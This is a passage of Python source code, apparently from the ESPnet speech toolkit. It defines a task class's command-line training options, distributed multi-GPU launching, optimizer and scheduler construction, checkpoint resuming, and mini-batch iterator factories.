formatter_class=ArgumentDefaultsRawTextHelpFormatter,
)
# NOTE(kamo): Use '_' instead of '-' to avoid confusion.
# I think '-' looks really confusing if it's written in yaml.
# NOTE(kamo): add_arguments(..., required=True) can't be used
# to provide --print_config mode. Instead of it, do as
parser.set_defaults(required=["output_dir"])
group = parser.add_argument_group("Common configuration")
group.add_argument(
"--print_config",
action="store_true",
help="Print the config file and exit",
)
group.add_argument(
"--log_level",
type=lambda x: x.upper(),
default="INFO",
choices=("ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"),
help="The verbose level of logging",
)
group.add_argument(
"--dry_run",
type=str2bool,
default=False,
help="Perform process without training",
)
group.add_argument(
"--iterator_type",
type=str,
choices=["sequence", "chunk", "none"],
default="sequence",
help="Specify iterator type",
)
group.add_argument("--output_dir", type=str_or_none, default=None)
group.add_argument(
"--ngpu",
type=int,
default=0,
help="The number of gpus. 0 indicates CPU mode",
)
group.add_argument("--seed", type=int, default=0, help="Random seed")
group.add_argument(
"--num_workers",
type=int,
default=1,
help="The number of workers used for DataLoader",
)
group.add_argument(
"--num_att_plot",
type=int,
default=3,
help="The number images to plot the outputs from attention. "
"This option makes sense only when attention-based model",
)
group = parser.add_argument_group("distributed training related")
group.add_argument(
"--dist_backend", default="nccl", type=str, help="distributed backend",
)
group.add_argument(
"--dist_init_method",
type=str,
default="env://",
help='if init_method="env://", env values of "MASTER_PORT", "MASTER_ADDR", '
'"WORLD_SIZE", and "RANK" are referred.',
)
group.add_argument(
"--dist_world_size",
default=None,
type=int_or_none,
help="number of nodes for distributed training",
)
group.add_argument(
"--dist_rank",
type=int_or_none,
default=None,
help="node rank for distributed training",
)
group.add_argument(
# Not starting with "dist_" for compatibility to launch.py
"--local_rank",
type=int_or_none,
default=None,
help="local rank for distributed training. This option is used if "
"--multiprocessing_distributed=false",
)
group.add_argument(
"--dist_master_addr",
default=None,
type=str_or_none,
help="The master address for distributed training. "
"This value is used when dist_init_method == 'env://'",
)
group.add_argument(
"--dist_master_port",
default=None,
type=int_or_none,
help="The master port for distributed training"
"This value is used when dist_init_method == 'env://'",
)
group.add_argument(
"--dist_launcher",
default=None,
type=str_or_none,
choices=["slurm", "mpi", None],
help="The launcher type for distributed training",
)
group.add_argument(
"--multiprocessing_distributed",
default=False,
type=str2bool,
help="Use multi-processing distributed training to launch "
"N processes per node, which has N GPUs. This is the "
"fastest way to use PyTorch for either single node or "
"multi node data parallel training",
)
group = parser.add_argument_group("cudnn mode related")
group.add_argument(
"--cudnn_enabled",
type=str2bool,
default=torch.backends.cudnn.enabled,
help="Enable CUDNN",
)
group.add_argument(
"--cudnn_benchmark",
type=str2bool,
default=torch.backends.cudnn.benchmark,
help="Enable cudnn-benchmark mode",
)
group.add_argument(
"--cudnn_deterministic",
type=str2bool,
default=True,
help="Enable cudnn-deterministic mode",
)
group = parser.add_argument_group("collect stats mode related")
group.add_argument(
"--collect_stats",
type=str2bool,
default=False,
help='Perform on "collect stats" mode',
)
group.add_argument(
"--write_collected_feats",
type=str2bool,
default=False,
help='Write the output features from the model when "collect stats" mode',
)
group = parser.add_argument_group("Trainer related")
group.add_argument(
"--max_epoch",
type=int,
default=40,
help="The maximum number epoch to train",
)
group.add_argument(
"--patience",
type=int_or_none,
default=None,
help="Number of epochs to wait without improvement "
"before stopping the training",
)
group.add_argument(
"--val_scheduler_criterion",
type=str,
nargs=2,
default=("valid", "loss"),
help="The criterion used for the value given to the lr scheduler. "
'Give a pair referring the phase, "train" or "valid",'
'and the criterion name. The mode specifying "min" or "max" can '
"be changed by --scheduler_conf",
)
group.add_argument(
"--early_stopping_criterion",
type=str,
nargs=3,
default=("valid", "loss", "min"),
help="The criterion used for judging of early stopping. "
'Give a pair referring the phase, "train" or "valid",'
'the criterion name and the mode, "min" or "max", e.g. "acc,max".',
)
group.add_argument(
"--best_model_criterion",
type=str2triple_str,
nargs="+",
default=[
("train", "loss", "min"),
("valid", "loss", "min"),
("train", "acc", "max"),
("valid", "acc", "max"),
],
help="The criterion used for judging of the best model. "
'Give a pair referring the phase, "train" or "valid",'
'the criterion name, and the mode, "min" or "max", e.g. "acc,max".',
)
group.add_argument(
"--keep_nbest_models",
type=int,
default=10,
help="Remove previous snapshots excluding the n-best scored epochs",
)
group.add_argument(
"--grad_clip",
type=float,
default=5.0,
help="Gradient norm threshold to clip",
)
group.add_argument(
"--grad_noise",
type=str2bool,
default=False,
help="The flag to switch to use noise injection to "
"gradients during training",
)
group.add_argument(
"--accum_grad",
type=int,
default=1,
help="The number of gradient accumulation",
)
group.add_argument(
"--no_forward_run",
type=str2bool,
default=False,
help="Just only iterating data loading without "
"model forwarding and training",
)
group.add_argument(
"--resume",
type=str2bool,
default=False,
help="Enable resuming if checkpoint is existing",
)
group.add_argument(
"--train_dtype",
default="float32",
choices=["float16", "float32", "float64", "O0", "O1", "O2", "O3"],
help="Data type for training. O0,O1,.. flags require apex. "
"See https://nvidia.github.io/apex/amp.html#opt-levels",
)
group.add_argument(
"--log_interval",
type=int_or_none,
default=None,
help="Show the logs every the number iterations in each epochs at the "
"training phase. If None is given, it is decided according the number "
"of training samples automatically .",
)
group = parser.add_argument_group("Pretraining model related")
group.add_argument("--pretrain_path", type=str, default=[], nargs="*")
group.add_argument("--pretrain_key", type=str_or_none, default=[], nargs="*")
group = parser.add_argument_group("BatchSampler related")
group.add_argument(
"--num_iters_per_epoch",
type=int_or_none,
default=None,
help="Restrict the number of iterations for training per epoch",
)
group.add_argument(
"--batch_size",
type=int,
default=20,
help="The mini-batch size used for training. Used if batch_type='unsorted',"
" 'sorted', or 'folded'.",
)
group.add_argument(
"--valid_batch_size",
type=int_or_none,
default=None,
help="If not given, the value of --batch_size is used",
)
group.add_argument(
"--batch_bins",
type=int,
default=1000000,
help="The number of batch bins. Used if batch_type='length' or 'numel'",
)
group.add_argument(
"--valid_batch_bins",
type=int_or_none,
default=None,
help="If not given, the value of --batch_bins is used",
)
group.add_argument("--train_shape_file", type=str, action="append", default=[])
group.add_argument("--valid_shape_file", type=str, action="append", default=[])
group = parser.add_argument_group("Sequence iterator related")
_batch_type_help = ""
for key, value in BATCH_TYPES.items():
_batch_type_help += f'"{key}":\n{value}\n'
group.add_argument(
"--batch_type",
type=str,
default="folded",
choices=list(BATCH_TYPES),
help=_batch_type_help,
)
group.add_argument(
"--valid_batch_type",
type=str_or_none,
default=None,
choices=list(BATCH_TYPES) + [None],
help="If not given, the value of --batch_type is used",
)
group.add_argument("--fold_length", type=int, action="append", default=[])
group.add_argument(
"--sort_in_batch",
type=str,
default="descending",
choices=["descending", "ascending"],
help="Sort the samples in each mini-batches by the sample "
'lengths. To enable this, "shape_file" must have the length information.',
)
group.add_argument(
"--sort_batch",
type=str,
default="descending",
choices=["descending", "ascending"],
help="Sort mini-batches by the sample lengths",
)
group.add_argument(
"--multiple_iterator",
type=str2bool,
default=False,
help="Use multiple iterator mode",
)
group = parser.add_argument_group("Chunk iterator related")
group.add_argument(
"--chunk_length",
type=str_or_int,
default=500,
help="Specify chunk length. e.g. '300', '300,400,500', or '300-400'."
"If multiple numbers separated by command are given, "
"one of them is selected randomly for each samples. "
"If two numbers are given with '-', it indicates the range of the choices. "
"Note that if the sequence length is shorter than the all chunk_lengths, "
"the sample is discarded. ",
)
group.add_argument(
"--chunk_shift_ratio",
type=float,
default=0.5,
help="Specify the shift width of chunks. If it's less than 1, "
"allows the overlapping and if bigger than 1, there are some gaps "
"between each chunk.",
)
group.add_argument(
"--num_cache_chunks",
type=int,
default=1024,
help="Shuffle in the specified number of chunks and generate mini-batches "
"More larger this value, more randomness can be obtained.",
)
group = parser.add_argument_group("Dataset related")
_data_path_and_name_and_type_help = (
"Give three words splitted by comma. It's used for the training data. "
"e.g. '--train_data_path_and_name_and_type some/path/a.scp,foo,sound'. "
"The first value, some/path/a.scp, indicates the file path, "
"and the second, foo, is the key name used for the mini-batch data, "
"and the last, sound, decides the file type. "
"This option is repeatable, so you can input any number of features "
"for your task. Supported file types are as follows:\n\n"
)
for key, dic in DATA_TYPES.items():
_data_path_and_name_and_type_help += f'"{key}":\n{dic["help"]}\n\n'
group.add_argument(
"--train_data_path_and_name_and_type",
type=str2triple_str,
action="append",
default=[],
help=_data_path_and_name_and_type_help,
)
group.add_argument(
"--valid_data_path_and_name_and_type",
type=str2triple_str,
action="append",
default=[],
)
group.add_argument(
"--allow_variable_data_keys",
type=str2bool,
default=False,
help="Allow the arbitrary keys for mini-batch with ignoring "
"the task requirements",
)
group.add_argument(
"--max_cache_size",
type=humanfriendly.parse_size,
default=0.0,
help="The maximum cache size for data loader. e.g. 10MB, 20GB.",
)
group.add_argument(
"--valid_max_cache_size",
type=humanfriendly_parse_size_or_none,
default=None,
help="The maximum cache size for validation data loader. e.g. 10MB, 20GB. "
"If None, the 5 percent size of --max_cache_size",
)
group = parser.add_argument_group("Optimizer related")
for i in range(1, cls.num_optimizers + 1):
suf = "" if i == 1 else str(i)
group.add_argument(
f"--optim{suf}",
type=lambda x: x.lower(),
default="adadelta",
choices=list(optim_classes),
help="The optimizer type",
)
group.add_argument(
f"--optim{suf}_conf",
action=NestedDictAction,
default=dict(),
help="The keyword arguments for optimizer",
)
group.add_argument(
f"--scheduler{suf}",
type=lambda x: str_or_none(x.lower()),
default=None,
choices=list(scheduler_classes) + [None],
help="The lr scheduler type",
)
group.add_argument(
f"--scheduler{suf}_conf",
action=NestedDictAction,
default=dict(),
help="The keyword arguments for lr scheduler",
)
cls.trainer.add_arguments(parser)
cls.add_task_arguments(parser)
assert check_return_type(parser)
return parser
@classmethod
def build_optimizers(
cls, args: argparse.Namespace, model: torch.nn.Module,
) -> List[torch.optim.Optimizer]:
if cls.num_optimizers != 1:
raise RuntimeError(
"build_optimizers() must be overridden if num_optimizers != 1"
)
optim_class = optim_classes.get(args.optim)
if optim_class is None:
raise ValueError(f"must be one of {list(optim_classes)}: {args.optim}")
optim = optim_class(model.parameters(), **args.optim_conf)
optimizers = [optim]
return optimizers
@classmethod
def exclude_opts(cls) -> Tuple[str, ...]:
"""The options not to be shown by --print_config"""
return "required", "print_config", "config", "ngpu"
@classmethod
def get_default_config(cls) -> Dict[str, Any]:
"""Return the configuration as dict.
This method is used by print_config()
"""
def get_class_type(name: str, classes: dict):
_cls = classes.get(name)
if _cls is None:
raise ValueError(f"must be one of {list(classes)}: {name}")
return _cls
# This method is used only for --print_config
assert check_argument_types()
parser = cls.get_parser()
args, _ = parser.parse_known_args()
config = vars(args)
# Excludes the options not to be shown
for k in AbsTask.exclude_opts():
config.pop(k)
for i in range(1, cls.num_optimizers + 1):
suf = "" if i == 1 else str(i)
name = config[f"optim{suf}"]
optim_class = get_class_type(name, optim_classes)
conf = get_default_kwargs(optim_class)
# Overwrite the default by the arguments,
conf.update(config[f"optim{suf}_conf"])
# and set it again
config[f"optim{suf}_conf"] = conf
name = config[f"scheduler{suf}"]
if name is not None:
scheduler_class = get_class_type(name, scheduler_classes)
conf = get_default_kwargs(scheduler_class)
# Overwrite the default by the arguments,
conf.update(config[f"scheduler{suf}_conf"])
# and set it again
config[f"scheduler{suf}_conf"] = conf
for class_choices in cls.class_choices_list:
if getattr(args, class_choices.name) is not None:
class_obj = class_choices.get_class(getattr(args, class_choices.name))
conf = get_default_kwargs(class_obj)
name = class_choices.name
# Overwrite the default by the arguments,
conf.update(config[f"{name}_conf"])
# and set it again
config[f"{name}_conf"] = conf
return config
@classmethod
def check_required_command_args(cls, args: argparse.Namespace):
assert check_argument_types()
for k in vars(args):
if "-" in k:
raise RuntimeError(f'Use "_" instead of "-": parser.get_parser("{k}")')
if len(args.pretrain_path) != len(args.pretrain_key):
raise RuntimeError(
"The number of --pretrain_path and --pretrain_key must be same"
)
required = ", ".join(
f"--{a}" for a in args.required if getattr(args, a) is None
)
if len(required) != 0:
parser = cls.get_parser()
parser.print_help(file=sys.stderr)
p = Path(sys.argv[0]).name
print(file=sys.stderr)
print(
f"{p}: error: the following arguments are required: " f"{required}",
file=sys.stderr,
)
sys.exit(2)
@classmethod
def check_task_requirements(
cls,
dataset: Union[ESPnetDataset, IterableESPnetDataset],
allow_variable_data_keys: bool,
inference: bool = False,
) -> None:
"""Check if the dataset satisfy the requirement of current Task"""
assert check_argument_types()
mes = (
f"If you intend to use an additional input, modify "
f'"{cls.__name__}.required_data_names()" or '
f'"{cls.__name__}.optional_data_names()". '
f"Otherwise you need to set --allow_variable_data_keys true "
)
for k in cls.required_data_names(inference):
if not dataset.has_name(k):
raise RuntimeError(
f'"{cls.required_data_names(inference)}" are required for'
f' {cls.__name__}. but "{dataset.names()}" are input.\n{mes}'
)
if not allow_variable_data_keys:
task_keys = cls.required_data_names(inference) + cls.optional_data_names(
inference
)
for k in dataset.names():
if k not in task_keys:
raise RuntimeError(
f"The data-name must be one of {task_keys} "
f'for {cls.__name__}: "{k}" is not allowed.\n{mes}'
)
@staticmethod
def resume(
checkpoint: Union[str, Path],
model: torch.nn.Module,
reporter: Reporter,
optimizers: Sequence[torch.optim.Optimizer],
schedulers: Sequence[Optional[AbsScheduler]],
ngpu: int = 0,
use_apex: bool = False,
):
states = torch.load(
checkpoint,
map_location=f"cuda:{torch.cuda.current_device()}" if ngpu > 0 else "cpu",
)
model.load_state_dict(states["model"])
reporter.load_state_dict(states["reporter"])
for optimizer, state in zip(optimizers, states["optimizers"]):
optimizer.load_state_dict(state)
for scheduler, state in zip(schedulers, states["schedulers"]):
if scheduler is not None:
scheduler.load_state_dict(state)
if use_apex and states["amp"] is not None:
try:
from apex import amp
except ImportError:
logging.error(
"You need to install apex. "
"See https://github.com/NVIDIA/apex#linux"
)
amp.load_state_dict(states["amp"])
logging.info(f"The training was resumed using {checkpoint}")
@classmethod
def print_config(cls, file=sys.stdout) -> None:
assert check_argument_types()
# Shows the config: e.g. python train.py asr --print_config
config = cls.get_default_config()
file.write(yaml_no_alias_safe_dump(config, indent=4, sort_keys=False))
@classmethod
def main(cls, args: argparse.Namespace = None, cmd: Sequence[str] = None):
if cls.num_optimizers != cls.trainer.num_optimizers:
raise RuntimeError(
f"Task.num_optimizers != Task.trainer.num_optimizers: "
f"{cls.num_optimizers} != {cls.trainer.num_optimizers}"
)
assert check_argument_types()
print(get_commandline_args(), file=sys.stderr)
if args is None:
parser = cls.get_parser()
args = parser.parse_args(cmd)
if args.print_config:
cls.print_config()
sys.exit(0)
cls.check_required_command_args(args)
# "distributed" is decided using the other command args
resolve_distributed_mode(args)
if not args.distributed or not args.multiprocessing_distributed:
cls.main_worker(args)
else:
assert args.ngpu > 1, args.ngpu
# Multi-processing distributed mode: e.g. 2node-4process-4GPU
# | Host1 | Host2 |
# | Process1 | Process2 | <= Spawn processes
# |Child1|Child2|Child1|Child2|
# |GPU1 |GPU2 |GPU1 |GPU2 |
# See also the following usage of --multiprocessing-distributed:
# https://github.com/pytorch/examples/blob/master/imagenet/main.py
num_nodes = get_num_nodes(args.dist_world_size, args.dist_launcher)
if num_nodes == 1:
args.dist_master_addr = "localhost"
args.dist_rank = 0
# Single node distributed training with multi-GPUs
if (
args.dist_init_method == "env://"
and get_master_port(args.dist_master_port) is None
):
# Get the unused port
args.dist_master_port = free_port()
# Assume that nodes use same number of GPUs each other
args.dist_world_size = args.ngpu * num_nodes
node_rank = get_node_rank(args.dist_rank, args.dist_launcher)
# The following block is copied from:
# https://github.com/pytorch/pytorch/blob/master/torch/multiprocessing/spawn.py
error_queues = []
processes = []
mp = torch.multiprocessing.get_context("spawn")
for i in range(args.ngpu):
# Copy args
local_args = argparse.Namespace(**vars(args))
local_args.local_rank = i
local_args.dist_rank = args.ngpu * node_rank + i
local_args.ngpu = 1
process = mp.Process(
target=cls.main_worker, args=(local_args,), daemon=False,
)
process.start()
processes.append(process)
error_queues.append(mp.SimpleQueue())
# Loop on join until it returns True or raises an exception.
while not ProcessContext(processes, error_queues).join():
pass
@classmethod
def main_worker(cls, args: argparse.Namespace):
assert check_argument_types()
# 0. Init distributed process
distributed_option = build_dataclass(DistributedOption, args)
distributed_option.init()
# NOTE(kamo): Don't use logging before invoking logging.basicConfig()
if not distributed_option.distributed or distributed_option.dist_rank == 0:
if not distributed_option.distributed:
_rank = ""
else:
_rank = (
f":{distributed_option.dist_rank}/"
f"{distributed_option.dist_world_size}"
)
# NOTE(kamo):
# logging.basicConfig() is invoked in main_worker() instead of main()
# because it can be invoked only once in a process.
# FIXME(kamo): Should we use logging.getLogger()?
logging.basicConfig(
level=args.log_level,
format=f"[{os.uname()[1].split('.')[0]}{_rank}]"
f" %(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
else:
# Suppress logging if RANK != 0
logging.basicConfig(
level="ERROR",
format=f"[{os.uname()[1].split('.')[0]}"
f":{distributed_option.dist_rank}/{distributed_option.dist_world_size}]"
f" %(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
# 1. Set random-seed
set_all_random_seed(args.seed)
torch.backends.cudnn.enabled = args.cudnn_enabled
torch.backends.cudnn.benchmark = args.cudnn_benchmark
torch.backends.cudnn.deterministic = args.cudnn_deterministic
# 2. Build model
model = cls.build_model(args=args)
if not isinstance(model, AbsESPnetModel):
raise RuntimeError(
f"model must inherit {AbsESPnetModel.__name__}, but got {type(model)}"
)
if args.train_dtype in ("float16", "float32", "float64"):
dtype = getattr(torch, args.train_dtype)
else:
dtype = torch.float32
model = model.to(dtype=dtype, device="cuda" if args.ngpu > 0 else "cpu")
# 3. Build optimizer
optimizers = cls.build_optimizers(args, model=model)
# For apex support
use_apex = args.train_dtype in ("O0", "O1", "O2", "O3")
if use_apex:
try:
from apex import amp
except ImportError:
logging.error(
"You need to install apex. "
"See https://github.com/NVIDIA/apex#linux"
)
raise
model, optimizers = amp.initialize(
model, optimizers, opt_level=args.train_dtype
)
# 4. Build schedulers
schedulers = []
for i, optim in enumerate(optimizers, 1):
suf = "" if i == 1 else str(i)
name = getattr(args, f"scheduler{suf}")
conf = getattr(args, f"scheduler{suf}_conf")
if name is not None:
cls_ = scheduler_classes.get(name)
if cls_ is None:
raise ValueError(
f"must be one of {list(scheduler_classes)}: {name}"
)
scheduler = cls_(optim, **conf)
else:
scheduler = None
schedulers.append(scheduler)
logging.info(pytorch_cudnn_version())
logging.info(model_summary(model))
for i, (o, s) in enumerate(zip(optimizers, schedulers), 1):
suf = "" if i == 1 else str(i)
logging.info(f"Optimizer{suf}:\n{o}")
logging.info(f"Scheduler{suf}: {s}")
# 5. Dump "args" to config.yaml
# NOTE(kamo): "args" should be saved after object-buildings are done
# because they are allowed to modify "args".
output_dir = Path(args.output_dir)
output_dir.mkdir(parents=True, exist_ok=True)
with (output_dir / "config.yaml").open("w", encoding="utf-8") as f:
logging.info(f'Saving the configuration in {output_dir / "config.yaml"}')
yaml_no_alias_safe_dump(vars(args), f, indent=4, sort_keys=False)
# 6. Loads pre-trained model
for p, k in zip(args.pretrain_path, args.pretrain_key):
load_pretrained_model(
model=model,
# Directly specify the model path e.g. exp/train/loss.best.pt
pretrain_path=p,
# if pretrain_key is None -> model
# elif pretrain_key is str e.g. "encoder" -> model.encoder
pretrain_key=k,
# NOTE(kamo): "cuda" for torch.load always indicates cuda:0
# in PyTorch<=1.4
map_location=f"cuda:{torch.cuda.current_device()}"
if args.ngpu > 0
else "cpu",
)
# 7. Resume the training state from the previous epoch
reporter = Reporter()
if args.resume and (output_dir / "checkpoint.pth").exists():
cls.resume(
checkpoint=output_dir / "checkpoint.pth",
model=model,
optimizers=optimizers,
schedulers=schedulers,
reporter=reporter,
ngpu=args.ngpu,
use_apex=use_apex,
)
if args.dry_run:
pass
elif args.collect_stats:
# Perform on collect_stats mode. This mode has two roles
# - Derive the length and dimension of all input data
# - Accumulate feats, square values, and the length for whitening
if args.valid_batch_size is None:
args.valid_batch_size = args.batch_size
if len(args.train_shape_file) != 0:
train_key_file = args.train_shape_file[0]
else:
train_key_file = None
if len(args.valid_shape_file) != 0:
valid_key_file = args.valid_shape_file[0]
else:
valid_key_file = None
collect_stats(
model=model,
train_iter=cls.build_streaming_iterator(
data_path_and_name_and_type=args.train_data_path_and_name_and_type,
key_file=train_key_file,
batch_size=args.batch_size,
dtype=args.train_dtype,
num_workers=args.num_workers,
allow_variable_data_keys=args.allow_variable_data_keys,
ngpu=args.ngpu,
preprocess_fn=cls.build_preprocess_fn(args, train=False),
collate_fn=cls.build_collate_fn(args),
),
valid_iter=cls.build_streaming_iterator(
data_path_and_name_and_type=args.valid_data_path_and_name_and_type,
key_file=valid_key_file,
batch_size=args.valid_batch_size,
dtype=args.train_dtype,
num_workers=args.num_workers,
allow_variable_data_keys=args.allow_variable_data_keys,
ngpu=args.ngpu,
preprocess_fn=cls.build_preprocess_fn(args, train=False),
collate_fn=cls.build_collate_fn(args),
),
output_dir=output_dir,
ngpu=args.ngpu,
log_interval=args.log_interval,
write_collected_feats=args.write_collected_feats,
)
else:
# 8. Build iterator factories
common_iter_kwargs = dict(
iterator_type=args.iterator_type,
train_dtype=args.train_dtype,
num_workers=args.num_workers,
seed=args.seed,
allow_variable_data_keys=args.allow_variable_data_keys,
ngpu=args.ngpu,
fold_length=args.fold_length,
sort_in_batch=args.sort_in_batch,
sort_batch=args.sort_batch,
chunk_length=args.chunk_length,
chunk_shift_ratio=args.chunk_shift_ratio,
num_cache_chunks=args.num_cache_chunks,
)
train_iter_factory = cls.build_iter_factory(
data_path_and_name_and_type=args.train_data_path_and_name_and_type,
shape_files=args.train_shape_file,
batch_size=args.batch_size,
batch_bins=args.batch_bins,
batch_type=args.batch_type,
train=not args.collect_stats,
multiple_iterator=args.multiple_iterator,
preprocess_fn=cls.build_preprocess_fn(args, train=True),
collate_fn=cls.build_collate_fn(args),
num_iters_per_epoch=args.num_iters_per_epoch,
max_cache_size=args.max_cache_size,
distributed=distributed_option.distributed,
name="train",
**common_iter_kwargs,
)
if args.valid_batch_type is None:
args.valid_batch_type = args.batch_type
if args.valid_batch_size is None:
args.valid_batch_size = args.batch_size
if args.valid_batch_bins is None:
args.valid_batch_bins = args.batch_bins
if args.valid_max_cache_size is None:
# Cache 5% of maximum size for validation loader
args.valid_max_cache_size = 0.05 * args.max_cache_size
valid_iter_factory = cls.build_iter_factory(
data_path_and_name_and_type=args.valid_data_path_and_name_and_type,
shape_files=args.valid_shape_file,
batch_size=args.valid_batch_size,
batch_bins=args.valid_batch_bins,
batch_type=args.batch_type,
train=False,
multiple_iterator=False,
preprocess_fn=cls.build_preprocess_fn(args, train=False),
collate_fn=cls.build_collate_fn(args),
num_iters_per_epoch=None,
max_cache_size=args.valid_max_cache_size,
distributed=distributed_option.distributed,
name="valid",
**common_iter_kwargs,
)
if args.num_att_plot != 0:
plot_attention_iter_factory = cls.build_iter_factory(
data_path_and_name_and_type=args.valid_data_path_and_name_and_type,
shape_files=args.valid_shape_file,
batch_type="unsorted",
batch_size=1,
batch_bins=0,
train=False,
multiple_iterator=False,
preprocess_fn=cls.build_preprocess_fn(args, train=False),
collate_fn=cls.build_collate_fn(args),
num_batches=args.num_att_plot,
num_iters_per_epoch=None,
# num_att_plot should be a few sample ~ 3, so cache all data.
max_cache_size=np.inf if args.max_cache_size != 0.0 else 0.0,
# always False because plot_attention performs on RANK0
distributed=False,
name="plot_att",
**common_iter_kwargs,
)
else:
plot_attention_iter_factory = None
# 9. Start training
# Don't give args to trainer.run() directly!!!
# Instead of it, define "Options" object and build here.
trainer_options = cls.trainer.build_options(args)
cls.trainer.run(
model=model,
optimizers=optimizers,
schedulers=schedulers,
train_iter_factory=train_iter_factory,
valid_iter_factory=valid_iter_factory,
plot_attention_iter_factory=plot_attention_iter_factory,
reporter=reporter,
output_dir=output_dir,
max_epoch=args.max_epoch,
seed=args.seed,
patience=args.patience,
keep_nbest_models=args.keep_nbest_models,
early_stopping_criterion=args.early_stopping_criterion,
best_model_criterion=args.best_model_criterion,
val_scheduler_criterion=args.val_scheduler_criterion,
trainer_options=trainer_options,
distributed_option=distributed_option,
)
if not distributed_option.distributed or distributed_option.dist_rank == 0:
# Generated n-best averaged model
average_nbest_models(
reporter=reporter,
output_dir=output_dir,
best_model_criterion=args.best_model_criterion,
nbest=args.keep_nbest_models,
)
@classmethod
def build_iter_factory(
cls,
iterator_type: str,
batch_size: int,
batch_bins: int,
preprocess_fn,
collate_fn,
train_dtype: str,
num_workers: int,
seed: int,
allow_variable_data_keys: bool,
ngpu: int,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
batch_type: str,
train: bool,
num_iters_per_epoch: Optional[int],
max_cache_size: float,
distributed: bool,
name: str,
fold_length: Sequence[int],
sort_in_batch: str,
sort_batch: str,
chunk_length: Union[int, str],
chunk_shift_ratio: float,
num_cache_chunks: int,
multiple_iterator: bool,
num_batches: int = None,
) -> AbsIterFactory:
"""Build a factory object of mini-batch iterator.
This object is invoked at every epochs to build the iterator for each epoch
as following:
>>> iter_factory = cls.build_iter_factory(...)
>>> for epoch in range(1, max_epoch):
... for keys, batch in iter_fatory.build_iter(epoch):
... model(**batch)
The mini-batches for each epochs are fully controlled by this class.
Note that the random seed used for shuffling is decided as "seed + epoch" and
the generated mini-batches can be reproduces when resuming.
Note that the definition of "epoch" doesn't always indicate
to run out of the whole training corpus.
"--num_iters_per_epoch" option restricts the number of iterations for each epoch
and the rest of samples for the originally epoch are left for the next epoch.
e.g. If The number of mini-batches equals to 4, the following two are same:
- 1 epoch without "--num_iters_per_epoch"
- 4 epoch with "--num_iters_per_epoch" == 4
"""
assert check_argument_types()
kwargs = dict(
data_path_and_name_and_type=data_path_and_name_and_type,
shape_files=shape_files,
train=train,
preprocess_fn=preprocess_fn,
collate_fn=collate_fn,
num_batches=num_batches,
num_iters_per_epoch=num_iters_per_epoch,
max_cache_size=max_cache_size,
distributed=distributed,
name=name,
batch_size=batch_size,
train_dtype=train_dtype,
num_workers=num_workers,
seed=seed,
allow_variable_data_keys=allow_variable_data_keys,
ngpu=ngpu,
)
if multiple_iterator:
return cls.build_multiple_iter_factroy(
**kwargs,
multiple_iterator=False,
iterator_type=iterator_type,
batch_type=batch_type,
batch_bins=batch_bins,
fold_length=fold_length,
sort_in_batch=sort_in_batch,
sort_batch=sort_batch,
chunk_length=chunk_length,
chunk_shift_ratio=chunk_shift_ratio,
num_cache_chunks=num_cache_chunks,
)
elif iterator_type == "sequence":
return cls.build_sequence_iter_factory(
**kwargs,
batch_type=batch_type,
batch_bins=batch_bins,
fold_length=fold_length,
sort_in_batch=sort_in_batch,
sort_batch=sort_batch,
)
elif iterator_type == "chunk":
return cls.build_chunk_iter_factory(
**kwargs,
chunk_length=chunk_length,
chunk_shift_ratio=chunk_shift_ratio,
num_cache_chunks=num_cache_chunks,
)
else:
raise RuntimeError(f"Not supported: iterator_type={iterator_type}")
@classmethod
def build_sequence_iter_factory(
cls,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
batch_type: str,
train: bool,
preprocess_fn,
batch_size: int,
batch_bins: int,
collate_fn,
train_dtype: str,
fold_length: Sequence[int],
num_workers: int,
sort_in_batch: str,
sort_batch: str,
seed: int,
allow_variable_data_keys: bool,
ngpu: int,
num_batches: Optional[int],
num_iters_per_epoch: Optional[int],
max_cache_size: float,
distributed: bool,
name: str,
) -> AbsIterFactory:
assert check_argument_types()
if train_dtype in ("float32", "O0", "O1", "O2", "O3"):
train_dtype = "float32"
dataset = ESPnetDataset(
data_path_and_name_and_type,
float_dtype=train_dtype,
preprocess=preprocess_fn,
max_cache_size=max_cache_size,
)
cls.check_task_requirements(dataset, allow_variable_data_keys)
batch_sampler = build_batch_sampler(
type=batch_type,
shape_files=shape_files,
fold_lengths=fold_length,
batch_size=batch_size,
batch_bins=batch_bins,
sort_in_batch=sort_in_batch,
sort_batch=sort_batch,
drop_last=False,
min_batch_size=torch.distributed.get_world_size() if distributed else 1,
)
batches = list(batch_sampler)
if num_batches is not None:
batches = batches[:num_batches]
bs_list = [len(batch) for batch in batches]
logging.info(f"[{name}] dataset:\n{dataset}")
logging.info(f"[{name}] Batch sampler: {batch_sampler}")
logging.info(
f"[{name}] mini-batch sizes summary: N-batch={len(bs_list)}, "
f"mean={np.mean(bs_list):.1f}, min={np.min(bs_list)}, max={np.max(bs_list)}"
)
if distributed:
world_size = torch.distributed.get_world_size()
rank = torch.distributed.get_rank()
for batch in batches:
if len(batch) < world_size:
raise RuntimeError(
f"The batch-size must be equal or more than world_size: "
f"{len(batch)} < {world_size}"
)
batches = [batch[rank::world_size] for batch in batches]
return SequenceIterFactory(
dataset=dataset,
batches=batches,
seed=seed,
num_iters_per_epoch=num_iters_per_epoch,
shuffle=train,
num_workers=num_workers,
collate_fn=collate_fn,
pin_memory=ngpu > 0,
)
@classmethod
def build_chunk_iter_factory(
cls,
data_path_and_name_and_type,
shape_files: Union[Tuple[str, ...], List[str]],
train: bool,
preprocess_fn,
collate_fn,
train_dtype: str,
num_workers: int,
seed: int,
allow_variable_data_keys: bool,
batch_size: int,
ngpu: int,
chunk_length: Union[int, str],
chunk_shift_ratio: float,
num_cache_chunks: int,
num_batches: Optional[int],
num_iters_per_epoch: Optional[int],
max_cache_size: float,
distributed: bool,
name: str,
) -> AbsIterFactory:
assert check_argument_types()
if train_dtype in ("float32", "O0", "O1", "O2", "O3"):
train_dtype = "float32"
dataset = ESPnetDataset(
data_path_and_name_and_type,
float_dtype=train_dtype,
preprocess=preprocess_fn,
max_cache_size=max_cache_size,
)
cls.check_task_requirements(dataset, allow_variable_data_keys)
if len(shape_files) == 0:
key_file = data_path_and_name_and_type[0][0]
else:
key_file = shape_files[0]
batch_sampler = UnsortedBatchSampler(batch_size=1, key_file=key_file)
batches = list(batch_sampler)
if num_batches is not None:
batches = batches[:num_batches]
